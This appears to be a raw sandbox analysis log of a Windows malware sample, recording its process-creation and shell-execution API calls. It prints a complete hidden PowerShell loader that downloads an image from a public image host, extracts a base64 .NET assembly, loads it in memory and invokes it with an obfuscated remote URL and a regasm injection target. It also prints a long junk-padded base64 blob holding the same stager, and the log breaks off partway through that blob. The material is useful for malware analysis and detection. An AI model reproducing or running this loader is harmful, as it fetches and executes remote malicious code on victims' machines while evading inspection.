cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2204
thread_handle: 0x00000330
process_identifier: 932
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000338
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWd